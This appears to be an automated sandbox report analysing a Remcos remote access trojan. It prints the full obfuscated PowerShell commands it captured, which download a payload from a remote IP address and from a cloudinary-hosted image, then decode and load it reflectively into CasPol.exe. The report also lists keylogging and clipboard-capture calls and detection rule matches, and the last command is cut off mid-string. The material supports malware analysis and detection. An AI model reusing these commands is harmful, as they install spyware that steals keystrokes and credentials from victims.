                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                        Source: powershell.exe, 00000003.00000002.1829991352.0000000006278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.0000000004461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005211000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.0000000004461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000007.00000002.2097314015.000000000600C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                        Source: powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.S
                        Source: powershell.exe, 00000003.00000002.1826688509.00000000033AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.SmbShare.cdxml=39327
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com6
                        Source: powershell.exe, 00000003.00000002.1829991352.0000000006278000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
                        Source: powershell.exe, 00000007.00000002.2097314015.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49738 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4168215268.000000000258F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB71 SystemParametersInfoW,12_2_0041BB71
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                        System Summary

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblemJump to behavior
                        Source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 7.2.powershell.exe.63d2830.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 7.2.powershell.exe.63d2830.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000007.00000002.2097314015.0000000006332000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000007.00000002.2097314015.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 6312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: CasPol.exe PID: 6456, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkF